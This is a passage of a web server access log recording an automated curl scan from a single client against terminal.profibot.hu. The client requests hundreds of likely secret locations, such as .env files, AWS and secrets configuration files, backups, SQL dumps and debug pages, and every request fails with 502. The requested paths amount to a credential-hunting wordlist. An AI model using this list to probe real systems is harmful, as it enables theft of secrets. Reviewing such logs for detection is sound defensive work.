web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/app.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/assets/vendor-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/Assignment3/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/Assignment4/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/audio/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/aws-secret.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/aws.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/aws/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/azure/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/as-alias/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/default/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/dev-env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/empty-values/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/filename/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/override-value/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/prod-env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/back-end/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/back/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backend/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backend/config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backend/debug" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backend/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backendfinaltest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backup.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/backup.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/base_dir/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/basic-network/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/bgoldd/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/bitcoind/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/blankon/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/blob/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/blog/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/blogs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:15 +0000] - - 502 - GET https terminal.profibot.hu "/blue/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/bookchain-client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/Booking/Default.aspx" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/Kubernetes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/OLCNE/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/bucoffea/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/_app/immutable/chunks/[chunk].[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/_app/immutable/entry/app.[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/entry.client-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/main.ba0c34b7.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/build/routes/index-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/cache.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/cardea/backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/cdw-backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/cgi-bin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/cgi-bin/pass.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch2-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch6-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch6a-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch7-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch7a-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch8-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch8a-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/ch8b-mytodo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/Chai/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/challenge/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/challenges/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/charts/liveObjects/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/chat-client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:16 +0000] - - 502 - GET https terminal.profibot.hu "/chiminey/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/chunk-B2FODB4I.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/ci/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/client-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/client/mutual-fund-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/client/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/ClientApp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/clld_dir/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/cloud/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/cmd/testdata/expected/dot_env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/code/api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/code/web/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/CodeGolf.Web/ClientApp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/codenames-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/collab-connect-web-application/server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/collected_static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/community/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/compose/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config.yaml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.dev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/aws.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/cache.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/default.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/keys.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/production.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.py" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/ContainerRegistry/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/containers/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:17 +0000] - - 502 - GET https terminal.profibot.hu "/content/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/control/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/Datavase/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/persistence/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/counterblockd/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/counterwallet/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/cp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/cronlab/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/cryo_project/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/css/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/custom/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/d/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/i.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/test.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/data/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/database/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dataset1/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/dataset2/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/db-admin/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/db.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/db.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/db_backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view.html" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view?panel=config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:18 +0000] - - 502 - GET https terminal.profibot.hu "/default/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/delivery/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/demo-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/demo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dep.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/deploy.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/deploy/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/deployment-config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dev-api/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dev-env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dev.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dev/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dev_env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 